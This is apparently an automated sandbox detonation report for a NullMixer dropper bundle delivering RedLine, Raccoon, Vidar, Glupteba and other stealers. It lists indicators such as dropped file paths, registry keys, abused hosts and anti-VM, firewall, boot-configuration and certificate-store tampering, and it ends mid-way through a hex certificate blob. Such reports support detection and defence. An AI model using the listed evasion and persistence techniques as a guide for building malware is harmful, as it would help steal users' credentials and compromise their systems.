Analysis Overview
SHA256
3195334294fd75b18e9c0bc593335290b73dcc315d5c25157f2a3225eb595bad
Threat Level: Known bad
The file 2cb613560f21a4d9464b525743d579ba was found to be: Known bad.
Malicious Activity Summary
Glupteba
Redline family
NullMixer
Nullmixer family
Windows security bypass
Fabookie family
Raccoon family
RedLine payload
Vidar
Raccoon
Socelars payload
Vidar family
Privateloader family
Raccoon Stealer V1 payload
Detect Fabookie payload
Socelars family
RedLine
Glupteba payload
PrivateLoader
Fabookie
Socelars
Glupteba family
Vidar Stealer
Modifies boot configuration data using bcdedit
Identifies VirtualBox via ACPI registry values (likely anti-VM)
NirSoft WebBrowserPassView
Detected Nirsoft tools
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
ASPack v2.12-2.42
Windows security modification
Reads user/profile data of web browsers
Checks BIOS information in registry
System Binary Proxy Execution: Odbcconf
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Manipulates WinMonFS driver.
Drops Chrome extension
Checks whether UAC is enabled
Adds Run key to start application
Looks up geolocation information via web service
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Checks for VirtualBox DLLs, possible anti-VM trick
Program crash
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Checks SCSI registry key(s)
Scheduled Task/Job: Scheduled Task
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Modifies system certificate store
Kills process with taskkill
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-08 10:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 10:35
Reported
2024-11-08 10:38
Platform
win7-20240903-en
Max time kernel
35s
Max time network
149s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
System Binary Proxy Execution: Odbcconf
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1515dbfc0edab0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2056 set thread context of 1628 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1507dd11d509.exe | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1507dd11d509.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun154ca5fada.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15e81af69f990d3a6.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1585e1028b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-H5F1P.tmp\Sun15b94526a807b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15372e8db79ed3d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1515dbfc0edab0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156d9ca8467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun150e9a93676ff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun154ca5fada.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5C9NP.tmp\Sun15b94526a807b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15c4c762b69ba5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15132bf2c585337a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15e81af69f990d3a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1524d92394d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15635943177.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15a8461882.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3B5581B1-9DBD-11EF-A059-6E295C7D81A3} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1524d92394d.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb